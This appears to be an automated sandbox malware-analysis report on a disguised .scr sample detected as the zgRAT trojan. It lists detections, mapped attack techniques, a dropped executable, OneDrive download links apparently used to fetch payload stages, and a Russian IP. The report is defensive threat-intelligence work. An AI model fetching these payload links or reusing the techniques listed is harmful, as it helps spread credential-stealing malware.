Source: Yara match	File source: 00000000.00000002.359476734.0000000007180000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.423329091.0000000003990000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.472630617.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3dff8d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e1f8f0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	41 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	34 System Information Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	2 Obfuscated Files or Information	1 Credentials in Registry	1 Query Registry	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 Install Root Certificate	Security Account Manager	231 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	1 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	51 Virtualization/Sandbox Evasion	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	51 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	64%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	100%	Avira	HEUR/AGEN.1304549
UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\Kbojz.exe	100%	Avira	HEUR/AGEN.1304549
C:\Users\user\AppData\Roaming\Kbojz.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Kbojz.exe	64%	ReversingLabs	ByteCode-MSIL.Trojan.Generic

Source	Detection	Scanner	Label
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
dual-spov-0006.spov-msedge.net	13.107.137.11	true	false	unknown
dual-spov-0006.spov-dc-msedge.net	150.171.41.11	true	false	unknown
public.am.files.1drv.com	unknown	unknown	false	high
utqurw.am.files.1drv.com	unknown	unknown	false	high
onedrive.live.com	unknown	unknown	false	high
skydrive.live.com	unknown	unknown	false	high
63.155.11.0.in-addr.arpa	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://onedrive.live.com/download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE	false		high
https://onedrive.live.com/download?resid=26943FEBC022618F%21481&authkey=!AJjxgOKv6NEIF-A	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.dr	false		high
https://duckduckgo.com/ac/?q=	Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.dr	false		high
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf	Ntxfuk.tmpdb.6.dr	false		high
https://github.com/mgravell/protobuf-netJ	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.000000000241E000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025DF000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.472630617.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.482725847.0000000003C46000.00000004.00000800.00020000.00000000.sdmp	false		high
https://onedrive.live.com/download?resid=26943FEBC022618F%21481&authkey=	Kbojz.exe, 00000006.00000002.478817595.0000000002453000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net03	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://utqurw.am.files.1drv.com/y4mFbMW97TPAIW_iquyB-Ao69Foeiu4Lp0Em3x5_9O_Ik0LysS9rZcK8ox-X1Eantad	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.000000000246E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.diginotar.nl/cps/pkioverheid0	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://skydrive.live.com/redir.aspx?resid=26943FEBC022618F%21481&avres=Infected&averror=SUCCESS&vin	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002466000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.000000000244C000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.00000000024E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-neti	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	false		high
https://www.google.com/search?q=wmf	Ntxfuk.tmpdb.6.dr	false		high
https://stackoverflow.com/q/11564914/23354;	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net0D	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002432000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.000000000221D000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002453000.00000004.00000800.00020000.00000000.sdmp	false		high
https://public.am.files.1drv.com/y4msme9eT8kXrOR-7wV9kiBohdMur1Lbs151ysdQuqKOSsl3mAiWGdSV3LP6WqYY9va	Kbojz.exe, 00000004.00000002.420766544.000000000225A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://onedrive.live.com	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.000000000244C000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.000000000246E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.entrust.net/server1.crl0	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://onedrive.live.com	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.000000000213C000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002444000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002432000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.000000000221D000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002465000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002453000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i	Ntxfuk.tmpdb.6.dr	false		high
http://ocsp.thawte.com0	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-net	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.dr	false		high
https://onedrive.live.com/download?resid=26943FEBC022618F%21479&authkey=	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.dr	false		high
http://www.symauth.com/cps0(	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	false		high
https://public.am.files.1drv.com/y4mQE8Cn-ey22tLqFzNP6Bvc0YOHW16UYVvHKAtb_HbiHHBX320gCSUBo3NE91NAaiU	Kbojz.exe, 00000003.00000002.407176401.000000000231A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/favicon.ico	Buyeg.tmpdb.2.dr	false		high
https://ac.ecosia.org/autocomplete?q=	Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.dr	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/sorry/index	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.00000000023F8000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.482725847.0000000003FB7000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002418000.00000004.00000800.00020000.00000000.sdmp, Kcidab.tmpdb.6.dr, Rdlgtuxmdrq.tmpdb.2.dr, Owotczgukzq.tmpdb.2.dr, Urmvri.tmpdb.2.dr, Rgcgvjqbqci.tmpdb.6.dr, Ntxfuk.tmpdb.6.dr	false		high
https://onedrive.live.com/download?resid=26943FEBC022618F	Kbojz.exe, 00000006.00000002.478817595.0000000002453000.00000004.00000800.00020000.00000000.sdmp	false		high
https://skydrive.live.com	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.00000000024E0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.symauth.com/rpa00	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	false		high
https://stackoverflow.com/q/2152978/23354	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp	false		high
https://utqurw.am.files.1drv.com	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.000000000246E000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002490000.00000004.00000800.00020000.00000000.sdmp	false		high
https://public.am.files.1drv.com/y4mAdtlexFWsAsM5m_v175jQDQZ3JlPlheZX222y4JutpDgoqJHt5wLr_wX4GD45dXi	Kbojz.exe, 00000004.00000002.420766544.00000000022C4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.codeplex.com/DotNetZip	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434522188.0000000006180000.00000004.08000000.00040000.00000000.sdmp	false		high
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a	Ntxfuk.tmpdb.6.dr	false		high
https://www.google.com/search?q=net	Ntxfuk.tmpdb.6.dr	false		high
https://www.google.com/sorry/indextest	Kbojz.exe, 00000006.00000002.482725847.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp, Kcidab.tmpdb.6.dr, Rdlgtuxmdrq.tmpdb.2.dr, Owotczgukzq.tmpdb.2.dr, Urmvri.tmpdb.2.dr, Rgcgvjqbqci.tmpdb.6.dr, Ntxfuk.tmpdb.6.dr	false		high
https://public.am.files.1drv.com	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002128000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.000000000231A000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.000000000225A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://utqurw.am.files.1drv.com/y4ms_vWzniFUJaBcF0Y1jNwvuu_3iedMM7s1JmtuLb_AtOzVrcYjTWzJYemZ-gol7I6	Kbojz.exe, 00000006.00000002.478817595.0000000002490000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.comodo.com/CPS0	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060CA000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.dr	false		high
http://crl.entrust.net/2048ca.crl0	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://utqurw.am.files.1drv.com	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002481000.00000004.00000800.00020000.00000000.sdmp	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
150.171.41.11	dual-spov-0006.spov-dc-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.137.11	dual-spov-0006.spov-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
80.85.152.161	unknown	Russian Federation	44493	CHELYABINSK-SIGNAL-ASRU	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1428798
Start date and time:	2024-04-19 16:15:58 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winSCR@9/24@61/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 91% Number of executed functions: 554 Number of non-executed functions: 33
Cookbook Comments:	Found application associated with file extension: .scr

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
Excluded IPs from analysis (whitelisted): 13.107.42.12, 20.72.77.134, 20.242.162.1, 20.242.161.228, 20.1.250.108
Excluded domains from analysis (whitelisted): cosmic-eastus2-ns-d2d9c8d5cfc0.trafficmanager.net, odc-web-brs.onedrive.akadns.net, l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, odc-am-files-geo.onedrive.akadns.net, odwebpl.trafficmanager.net, cosmic-eastus2-ns-8a58b1860b73.trafficmanager.net, am-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, cosmic-eastus-ns-9067974ac67b.trafficmanager.net, odc-am-files-brs.onedrive.akadns.net, cosmic-eastus-ns-75bf60968b55.trafficmanager.net
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
